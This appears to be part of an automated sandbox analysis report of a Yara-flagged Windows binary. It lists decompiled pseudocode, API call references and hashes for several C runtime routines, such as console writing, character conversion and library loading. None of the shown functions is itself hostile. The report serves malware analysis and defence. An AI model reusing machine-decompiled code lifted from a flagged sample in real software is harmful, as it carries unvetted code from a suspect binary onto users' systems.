                                                                    0x00407a42
                                                                    0x00407a46
                                                                    0x00407a4b
                                                                    0x00407a4d
                                                                    0x00407a4f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x004079e7
                                                                    0x004079ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079f2
                                                                    0x004079f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a10
                                                                    0x00407a14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a1a
                                                                    0x0040794d
                                                                    0x0040794f
                                                                    0x00407951
                                                                    0x00407959
                                                                    0x00407978
                                                                    0x0040797a
                                                                    0x00407984
                                                                    0x00407986
                                                                    0x00407987
                                                                    0x00407989
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040798f
                                                                    0x00407995
                                                                    0x00407995
                                                                    0x00000000
                                                                    0x00407995
                                                                    0x0040795d
                                                                    0x00407961
                                                                    0x00407966
                                                                    0x0040796a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407970
                                                                    0x00000000
                                                                    0x00407970

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                    • __alloca_probe_16.LIBCMT ref: 00407961
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                    • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                    • __freea.LIBCMT ref: 00407AB6
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    • __freea.LIBCMT ref: 00407ABF
                                                                    • __freea.LIBCMT ref: 00407AE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                    • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xa7e2061e
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                                    0x0040822b
                                                                    0x00408232
                                                                    0x00408235
                                                                    0x0040823d
                                                                    0x00408241
                                                                    0x0040824d
                                                                    0x00408250
                                                                    0x00408253
                                                                    0x0040825a
                                                                    0x00408262
                                                                    0x00408265
                                                                    0x0040826b
                                                                    0x00408271
                                                                    0x00408276
                                                                    0x00408278
                                                                    0x0040827b
                                                                    0x00408280
                                                                    0x0040828a
                                                                    0x00408291
                                                                    0x00408294
                                                                    0x0040829b
                                                                    0x004082a2
                                                                    0x004082ce
                                                                    0x004082f4
                                                                    0x004082f6
                                                                    0x00000000
                                                                    0x004082d0
                                                                    0x004082d3
                                                                    0x0040839a
                                                                    0x004083a6
                                                                    0x004083b1
                                                                    0x004083b6
                                                                    0x004082d9
                                                                    0x004082e0
                                                                    0x004082e5
                                                                    0x004082eb
                                                                    0x004082f1
                                                                    0x00000000
                                                                    0x004082f1
                                                                    0x004082eb
                                                                    0x004082d3
                                                                    0x004082a4
                                                                    0x004082a8
                                                                    0x004082ab
                                                                    0x004082b1
                                                                    0x004082b3
                                                                    0x004082b6
                                                                    0x004082ba
                                                                    0x004082f7
                                                                    0x004082fa
                                                                    0x004082fb
                                                                    0x00408300
                                                                    0x00408306
                                                                    0x0040830c
                                                                    0x0040831b
                                                                    0x00408321
                                                                    0x00408327
                                                                    0x0040832c
                                                                    0x00408348
                                                                    0x004083bb
                                                                    0x004083c1
                                                                    0x0040834a
                                                                    0x00408352
                                                                    0x0040835b
                                                                    0x00408361
                                                                    0x00000000
                                                                    0x00408363
                                                                    0x00408365
                                                                    0x00408368
                                                                    0x00408381
                                                                    0x00000000
                                                                    0x00408383
                                                                    0x00408387
                                                                    0x00408389
                                                                    0x0040838c
                                                                    0x00000000
                                                                    0x0040838c
                                                                    0x00408387
                                                                    0x00408381
                                                                    0x00408361
                                                                    0x0040835b
                                                                    0x00408348
                                                                    0x0040832c
                                                                    0x00408306
                                                                    0x00000000
                                                                    0x0040838f
                                                                    0x0040838f
                                                                    0x004083c3
                                                                    0x004083cd
                                                                    0x004083d5

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                    • __fassign.LIBCMT ref: 004082E0
                                                                    • __fassign.LIBCMT ref: 004082FB
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                    • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                    • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                    • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 27%
                                                                    			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xa7e2061e
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                                                    0x00403639
                                                                    0x00403640
                                                                    0x00403643
                                                                    0x00403647
                                                                    0x00403652
                                                                    0x0040365a
                                                                    0x00403665
                                                                    0x0040366b
                                                                    0x0040366f
                                                                    0x00403676
                                                                    0x0040367c
                                                                    0x0040367c
                                                                    0x0040367e
                                                                    0x00403683
                                                                    0x00403688
                                                                    0x00403688
                                                                    0x00403693
                                                                    0x0040369b

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                    • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xa7e2061e
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                                    0x004062c0
                                                                    0x004062c7
                                                                    0x004062ca
                                                                    0x004062d3
                                                                    0x004062d8
                                                                    0x004062dd
                                                                    0x004062e2
                                                                    0x004062e5
                                                                    0x004062e7
                                                                    0x004062e7
                                                                    0x004062ec
                                                                    0x00406305
                                                                    0x0040630b
                                                                    0x00406310
                                                                    0x004063af
                                                                    0x004063b3
                                                                    0x004063b8
                                                                    0x004063b8
                                                                    0x004063cc
                                                                    0x004063d4
                                                                    0x004063d4
                                                                    0x00406316
                                                                    0x00406319
                                                                    0x0040631e
                                                                    0x00406322
                                                                    0x0040636e
                                                                    0x00406370
                                                                    0x00406372
                                                                    0x00406377
                                                                    0x0040638e
                                                                    0x00406396
                                                                    0x004063a6
                                                                    0x004063a6
                                                                    0x00406396
                                                                    0x004063a8
                                                                    0x004063a9
                                                                    0x00000000
                                                                    0x004063ae
                                                                    0x00406324
                                                                    0x00406329
                                                                    0x0040632b
                                                                    0x0040632d
                                                                    0x0040632d
                                                                    0x00406335
                                                                    0x00406352
                                                                    0x0040635c
                                                                    0x00406361
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406363
                                                                    0x00406369
                                                                    0x00406369
                                                                    0x00000000
                                                                    0x00406369
                                                                    0x00406339
                                                                    0x0040633d
                                                                    0x00406342
                                                                    0x00406346
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406348
                                                                    0x00000000

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                    • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                    • __freea.LIBCMT ref: 004063A9
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                    • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x7a7e28
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                                                                    0x00409be4
                                                                    0x00409bf1
                                                                    0x00409bf7
                                                                    0x00409bff
                                                                    0x00409c0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c15
                                                                    0x00409c15
                                                                    0x00409c17
                                                                    0x00409c29
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c2b
                                                                    0x00409c3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c43
                                                                    0x00409c45
                                                                    0x00409c46
                                                                    0x00409c5e
                                                                    0x00409c65
                                                                    0x00000000
                                                                    0x00409c73
                                                                    0x00000000
                                                                    0x00409c6e
                                                                    0x00409bff
                                                                    0x00409bf3
                                                                    0x00409bf3
                                                                    0x00000000

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                                                                    • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                                                                    • __dosmaperr.LIBCMT ref: 00409C68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID: (~z
                                                                    • API String ID: 2583163307-3362980368
                                                                    • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                    • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                                                                    • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                    • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xa7e2061f
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                    0x00405756
                                                                    0x0040575a
                                                                    0x00405761
                                                                    0x00405765
                                                                    0x00405773
                                                                    0x00405789
                                                                    0x0040578d
                                                                    0x004057b6
                                                                    0x004057b8
                                                                    0x004057bc
                                                                    0x004057bf
                                                                    0x004057bf
                                                                    0x004057c5
                                                                    0x004057c7
                                                                    0x00000000
                                                                    0x004057c8
                                                                    0x0040578f
                                                                    0x00405798
                                                                    0x004057a7
                                                                    0x0040579a
                                                                    0x0040579d
                                                                    0x004057a3
                                                                    0x004057a3
                                                                    0x004057ab
                                                                    0x00000000
                                                                    0x004057ad
                                                                    0x004057b0
                                                                    0x004057b2
                                                                    0x00000000
                                                                    0x004057b2
                                                                    0x004057ab
                                                                    0x00405767
                                                                    0x0040576c
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                    • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                    • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                    0x00404320
                                                                    0x00404320
                                                                    0x00404320
                                                                    0x0040432a
                                                                    0x0040432c
                                                                    0x00404331
                                                                    0x00404334
                                                                    0x00404342
                                                                    0x00404349
                                                                    0x0040434e
                                                                    0x00404351
                                                                    0x00404354
                                                                    0x00404366
                                                                    0x0040436b
                                                                    0x0040436d
                                                                    0x00404378
                                                                    0x0040437f
                                                                    0x00404384
                                                                    0x00404387
                                                                    0x00404389
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x0040436f
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x00404356
                                                                    0x00404356
                                                                    0x00404357
                                                                    0x00404357
                                                                    0x0040435c
                                                                    0x00404397
                                                                    0x00404398
                                                                    0x0040439e
                                                                    0x004043a3
                                                                    0x004043a6
                                                                    0x004043a7
                                                                    0x004043a8
                                                                    0x004043af
                                                                    0x004043b1
                                                                    0x004043b3
                                                                    0x004043b8
                                                                    0x004043bb
                                                                    0x004043c9
                                                                    0x004043d5
                                                                    0x004043d8
                                                                    0x004043db
                                                                    0x004043ed
                                                                    0x004043f2
                                                                    0x004043f4
                                                                    0x004043ff
                                                                    0x00404405
                                                                    0x0040440d
                                                                    0x0040440f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043f6
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043dd
                                                                    0x004043dd
                                                                    0x004043de
                                                                    0x004043de
                                                                    0x00404411
                                                                    0x00404412
                                                                    0x00404412
                                                                    0x004043bd
                                                                    0x004043c3
                                                                    0x004043c7
                                                                    0x0040441a
                                                                    0x0040441b
                                                                    0x00404421
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043c7
                                                                    0x00404428
                                                                    0x00404428
                                                                    0x00404336
                                                                    0x0040433c
                                                                    0x00404340
                                                                    0x0040438b
                                                                    0x0040438c
                                                                    0x00404396
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404340

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                    • _abort.LIBCMT ref: 0040439E
                                                                    Memory Dump Source
